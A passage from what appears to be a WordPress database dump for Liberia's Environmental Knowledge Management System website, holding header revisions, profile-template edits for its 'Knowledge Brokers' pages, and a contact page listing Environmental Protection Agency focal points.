href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekms-liberia.mn.co/\">Join our Community</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n</ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-16 02:09:04','2019-11-16 02:09:04','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2385,1,'2019-11-16 02:09:54','2019-11-16 02:09:54','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n			<a href=\"https://ekms-liberia.mn.co/\" role=\"button\">\n						Join the Community\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-2381\"><a href=\"https://ekms-liberia.mn.co/\">Join our Community</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-121\"><a href=\"https://ekmsliberia.info/events/\">Events</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li></ul>\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekms-liberia.mn.co/\">Join our Community</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n</ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-16 02:09:54','2019-11-16 02:09:54','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2386,1,'2019-11-16 02:11:58','2019-11-16 02:11:58','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n			<a href=\"https://ekms-liberia.mn.co/\" role=\"button\">\n						Join Our Community\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-2381\"><a href=\"https://ekms-liberia.mn.co/\">Join our Community</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-121\"><a href=\"https://ekmsliberia.info/events/\">Events</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li></ul>\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekms-liberia.mn.co/\">Join our Community</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n</ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-16 02:11:58','2019-11-16 02:11:58','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2387,1,'2019-11-16 02:17:13','2019-11-16 02:17:13','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n			<a href=\"https://ekms-liberia.mn.co/\" target=\"_blank\" role=\"button\" rel=\"noopener noreferrer\">\n						Join Our Community\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-2381\"><a href=\"https://ekms-liberia.mn.co/\">Join our Community</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-121\"><a href=\"https://ekmsliberia.info/events/\">Events</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li></ul>\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekms-liberia.mn.co/\">Join our Community</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n</ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-16 02:17:13','2019-11-16 02:17:13','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2388,1,'2019-11-16 02:21:24','2019-11-16 02:21:24','','Knowledge Brokers','','publish','closed','closed','','knowledge_broker','','','2019-11-16 03:14:17','2019-11-16 03:14:17','',0,'https://ekmsliberia.info/?post_type=_pods_pod&#038;p=2388',0,'_pods_pod','',0),(2390,1,'2019-11-16 02:31:52','2019-11-16 02:31:52','','Position','','publish','closed','closed','','position','','','2019-11-16 03:14:17','2019-11-16 03:14:17','',2388,'https://ekmsliberia.info/?post_type=_pods_field&#038;p=2390',1,'_pods_field','',0),(2391,1,'2019-11-16 02:31:52','2019-11-16 02:31:52','','E-mail','','publish','closed','closed','','e-mail','','','2019-11-16 03:14:17','2019-11-16 03:14:17','',2388,'https://ekmsliberia.info/?post_type=_pods_field&#038;p=2391',2,'_pods_field','',0),(2392,1,'2019-11-16 02:31:53','2019-11-16 02:31:53','','Phone','','publish','closed','closed','','phone','','','2019-11-16 03:14:17','2019-11-16 03:14:17','',2388,'https://ekmsliberia.info/?post_type=_pods_field&#038;p=2392',3,'_pods_field','',0),(2393,1,'2019-11-16 02:43:55','2019-11-16 02:43:55','<p>{@photo._img.medium}</p>\r\n<hr width=\"100%\" color=\"#d3d3d3\">\r\n<p>About:</p>\r\n<p>{@post_content}</p>\r\n<p>{@position}</p>\r\n<p>{@e-mail}</p>\r\n<p>{@phone}</p>','Knowledge Brokers Template','','publish','closed','closed','','knowledge-brokers-template','','','2019-11-16 03:16:54','2019-11-16 03:16:54','',0,'https://ekmsliberia.info/?post_type=_pods_template&#038;p=2393',0,'_pods_template','',0),(2394,1,'2019-11-16 02:43:55','2019-11-16 02:43:55','<h3>Knowledge Broker Profile<h3>\r\n<hr width=\"100%\" color=\"#d3d3d3\">\r\n<p>{@post_thumbnail.medium</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Name:&nbsp;{@post_title}</p>\r\n<hr width=\"100%\" color=\"#d3d3d3\">\r\n<p>About:</p><br><br>\r\n<p>{@post_content}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Organization:&nbsp;{@organization}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Title:&nbsp;{@titleposition}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>E-mail:&nbsp;{@e-mail}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Phone:&nbsp;{@phone}</p>','Knowledge Brokers Template','','inherit','closed','closed','','2393-revision-v1','','','2019-11-16 02:43:55','2019-11-16 02:43:55','',2393,'https://ekmsliberia.info/2393-revision-v1/',0,'revision','',0),(2395,1,'2019-11-16 02:50:27','2019-11-16 02:50:27','Mr. J. S. Datuama Cammue is a staff at the Environmental Protection Agency. He is the Focal Point for the United Nations Convention on Biological Diversity.','J.S. Datuama Cammue','','publish','closed','closed','','j-s-datuama-cammue','','','2019-11-16 03:19:10','2019-11-16 03:19:10','',0,'https://ekmsliberia.info/?post_type=knowledge_broker&#038;p=2395',5,'knowledge_broker','',0),(2396,1,'2019-11-16 02:55:49','2019-11-16 02:55:49','<hr width=\"100%\" color=\"#d3d3d3\">\r\n<p>{@post_thumbnail.medium}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Name:&nbsp;{@post_title}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>About:</p><br><br>\r\n<p>{@post_content}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Organization:&nbsp;{@organization}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Title:&nbsp;{@titleposition}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>E-mail:&nbsp;{@e-mail}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Phone:&nbsp;{@phone}</p>','Knowledge Brokers Template','','inherit','closed','closed','','2393-revision-v1','','','2019-11-16 02:55:49','2019-11-16 02:55:49','',2393,'https://ekmsliberia.info/2393-revision-v1/',0,'revision','',0),(2397,1,'2019-11-16 02:56:59','2019-11-16 02:56:59','<hr width=\"100%\" color=\"#d3d3d3\">\r\n<p>{@post_thumbnail}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Name:&nbsp;{@post_title}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>About:</p><br><br>\r\n<p>{@post_content}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Organization:&nbsp;{@organization}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Title:&nbsp;{@titleposition}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>E-mail:&nbsp;{@e-mail}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Phone:&nbsp;{@phone}</p>','Knowledge Brokers Template','','inherit','closed','closed','','2393-revision-v1','','','2019-11-16 02:56:59','2019-11-16 02:56:59','',2393,'https://ekmsliberia.info/2393-revision-v1/',0,'revision','',0),(2398,1,'2019-11-16 02:57:48','2019-11-16 02:57:48','<hr width=\"100%\" color=\"#d3d3d3\">\r\n<p>{@post_thumbnail}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>About:</p><br><br>\r\n<p>{@post_content}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Organization:&nbsp;{@organization}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Title:&nbsp;{@titleposition}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>E-mail:&nbsp;{@e-mail}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Phone:&nbsp;{@phone}</p>','Knowledge Brokers Template','','inherit','closed','closed','','2393-revision-v1','','','2019-11-16 02:57:48','2019-11-16 02:57:48','',2393,'https://ekmsliberia.info/2393-revision-v1/',0,'revision','',0),(2399,1,'2019-11-16 02:58:02','2019-11-16 02:58:02','<hr width=\"100%\" color=\"#d3d3d3\">\r\n<p>{@post_thumbnail.medium}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>About:</p><br><br>\r\n<p>{@post_content}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Organization:&nbsp;{@organization}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Title:&nbsp;{@titleposition}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>E-mail:&nbsp;{@e-mail}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>Phone:&nbsp;{@phone}</p>','Knowledge Brokers Template','','inherit','closed','closed','','2393-revision-v1','','','2019-11-16 02:58:02','2019-11-16 02:58:02','',2393,'https://ekmsliberia.info/2393-revision-v1/',0,'revision','',0),(2400,1,'2019-11-16 03:02:17','2019-11-16 03:02:17','<hr width=\"100%\" color=\"#d3d3d3\">\r\n<p>{@post_thumbnail.medium}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>About:</p><br><br>\r\n<p>{@post_content}</p>\r\n<br><br>\r\n<p>Organization:&nbsp;{@organization}</p>\r\n<br><br>\r\n<p>Title:&nbsp;{@titleposition}</p>\r\n<br><br>\r\n<p>E-mail:&nbsp;{@e-mail}</p>\r\n<br><br>\r\n<p>Phone:&nbsp;{@phone}</p>','Knowledge Brokers Template','','inherit','closed','closed','','2393-revision-v1','','','2019-11-16 03:02:17','2019-11-16 03:02:17','',2393,'https://ekmsliberia.info/2393-revision-v1/',0,'revision','',0),(2401,1,'2019-11-16 03:03:07','2019-11-16 03:03:07','','Photo','','publish','closed','closed','','photo','','','2019-11-16 03:14:17','2019-11-16 03:14:17','',2388,'https://ekmsliberia.info/?post_type=_pods_field&#038;p=2401',0,'_pods_field','',0),(2402,1,'2019-11-16 03:03:36','2019-11-16 03:03:36','<hr width=\"100%\" color=\"#d3d3d3\">\r\n<p>{@</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>About:</p><br><br>\r\n<p>{@post_content}</p>\r\n<br><br>\r\n<p>Organization:&nbsp;{@organization}</p>\r\n<br><br>\r\n<p>Title:&nbsp;{@titleposition}</p>\r\n<br><br>\r\n<p>E-mail:&nbsp;{@e-mail}</p>\r\n<br><br>\r\n<p>Phone:&nbsp;{@phone}</p>','Knowledge Brokers Template','','inherit','closed','closed','','2393-revision-v1','','','2019-11-16 03:03:36','2019-11-16 03:03:36','',2393,'https://ekmsliberia.info/2393-revision-v1/',0,'revision','',0),(2403,1,'2019-11-16 03:04:48','2019-11-16 03:04:48','<hr width=\"100%\" color=\"#d3d3d3\">\r\n<p>{@photo._img.medium}</p>\r\n<hr width=\"40%\" color=\"#d3d3d3\">\r\n<p>About:</p><br><br>\r\n<p>{@post_content}</p>\r\n<br><br>\r\n<p>Organization:&nbsp;{@organization}</p>\r\n<br><br>\r\n<p>Title:&nbsp;{@titleposition}</p>\r\n<br><br>\r\n<p>E-mail:&nbsp;{@e-mail}</p>\r\n<br><br>\r\n<p>Phone:&nbsp;{@phone}</p>','Knowledge Brokers Template','','inherit','closed','closed','','2393-revision-v1','','','2019-11-16 03:04:48','2019-11-16 03:04:48','',2393,'https://ekmsliberia.info/2393-revision-v1/',0,'revision','',0),(2404,1,'2019-11-16 03:09:13','2019-11-16 03:09:13','Mr. J. S. Datuama Cammue is a staff at the Environmental Protection Agency. He is the Focal Point for the United','J.S. Datuama Cammue','','inherit','closed','closed','','2395-autosave-v1','','','2019-11-16 03:09:13','2019-11-16 03:09:13','',2395,'https://ekmsliberia.info/2395-autosave-v1/',0,'revision','',0),(2405,1,'2019-11-16 03:11:05','2019-11-16 03:11:05','<p>{@photo._img.medium}</p>\r\n<hr width=\"100%\" color=\"#d3d3d3\">\r\n<p>About:</p><br><br>\r\n<p>{@post_content}</p>\r\n<br>\r\n<p>Organization:&nbsp;{@organization}</p>\r\n<br>\r\n<p>Title:&nbsp;{@titleposition}</p>\r\n<br>\r\n<p>E-mail:&nbsp;{@e-mail}</p>\r\n<br>\r\n<p>Phone:&nbsp;{@phone}</p>','Knowledge Brokers Template','','inherit','closed','closed','','2393-revision-v1','','','2019-11-16 03:11:05','2019-11-16 03:11:05','',2393,'https://ekmsliberia.info/2393-revision-v1/',0,'revision','',0),(2406,1,'2019-11-16 03:11:22','2019-11-16 03:11:22','<p>{@photo._img.medium}</p>\r\n<hr width=\"100%\" color=\"#d3d3d3\">\r\n<p>About:</p>\r\n<p>{@post_content}</p>\r\n<br>\r\n<p>Organization:&nbsp;{@organization}</p>\r\n<br>\r\n<p>Title:&nbsp;{@titleposition}</p>\r\n<br>\r\n<p>E-mail:&nbsp;{@e-mail}</p>\r\n<br>\r\n<p>Phone:&nbsp;{@phone}</p>','Knowledge Brokers Template','','inherit','closed','closed','','2393-revision-v1','','','2019-11-16 03:11:22','2019-11-16 03:11:22','',2393,'https://ekmsliberia.info/2393-revision-v1/',0,'revision','',0),(2407,1,'2019-11-16 03:13:35','2019-11-16 03:13:35','<p>{@photo._img.medium}</p>\r\n<hr width=\"100%\" color=\"#d3d3d3\">\r\n<p>About:</p>\r\n<p>{@post_content}</p>\r\n<br>\r\n<p>Position:&nbsp;{@titleposition}</p>\r\n<br>\r\n<p>E-mail:&nbsp;{@e-mail}</p>\r\n<br>\r\n<p>Phone:&nbsp;{@phone}</p>','Knowledge Brokers Template','','inherit','closed','closed','','2393-revision-v1','','','2019-11-16 03:13:35','2019-11-16 03:13:35','',2393,'https://ekmsliberia.info/2393-revision-v1/',0,'revision','',0),(2408,1,'2019-11-16 03:16:25','2019-11-16 03:16:25','<p>{@photo._img.medium}</p>\r\n<hr width=\"100%\" color=\"#d3d3d3\">\r\n<p>About:</p>\r\n<p>{@post_content}</p>\r\n<br>\r\n<p>{@position}</p>\r\n<p>{@e-mail}</p>\r\n<p>{@phone}</p>','Knowledge Brokers Template','','inherit','closed','closed','','2393-revision-v1','','','2019-11-16 03:16:25','2019-11-16 03:16:25','',2393,'https://ekmsliberia.info/2393-revision-v1/',0,'revision','',0),(2409,1,'2019-11-16 03:16:54','2019-11-16 03:16:54','<p>{@photo._img.medium}</p>\r\n<hr width=\"100%\" color=\"#d3d3d3\">\r\n<p>About:</p>\r\n<p>{@post_content}</p>\r\n<p>{@position}</p>\r\n<p>{@e-mail}</p>\r\n<p>{@phone}</p>','Knowledge Brokers Template','','inherit','closed','closed','','2393-revision-v1','','','2019-11-16 03:16:54','2019-11-16 03:16:54','',2393,'https://ekmsliberia.info/2393-revision-v1/',0,'revision','',0),(2410,1,'2019-11-16 03:24:09','2019-11-16 03:24:09','Mr. <strong>Benjamin Karmorh</strong> is a staff at the Environmental Protection Agency. He is the Focal Point for the United Nations Framework Convention on Climate Change.','Benjamin Karmorh','','publish','closed','closed','','benjamin-karmorh','','','2019-11-16 03:24:09','2019-11-16 03:24:09','',0,'https://ekmsliberia.info/?post_type=knowledge_broker&#038;p=2410',4,'knowledge_broker','',0),(2411,1,'2019-11-16 03:26:53','2019-11-16 03:26:53','Mr. <strong>Berexford S. Jallah</strong> is a staff at the Environmental Protection Agency. He is the Focal Point for the United Nations Framework Convention on Climate Change.','Berexford S. Jallah','','publish','closed','closed','','berexford-s-jallah','','','2019-11-16 03:28:03','2019-11-16 03:28:03','',0,'https://ekmsliberia.info/?post_type=knowledge_broker&#038;p=2411',3,'knowledge_broker','',0),(2413,1,'2019-11-16 03:31:02','2019-11-16 03:31:02','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" data-elementor-open-lightbox=\"\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />								</a>\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"knowledge_broker_BJ\" alt=\"knowledge_broker_BJ\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer, EPA<br>\nUNCBD Focal Point<br>\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong><br>\nMEAs Coordinator, EPA<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator, EPA<br>\nUNCCD Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"knowledge_broker_JJ\" alt=\"knowledge_broker_JJ\" />											\n										<img 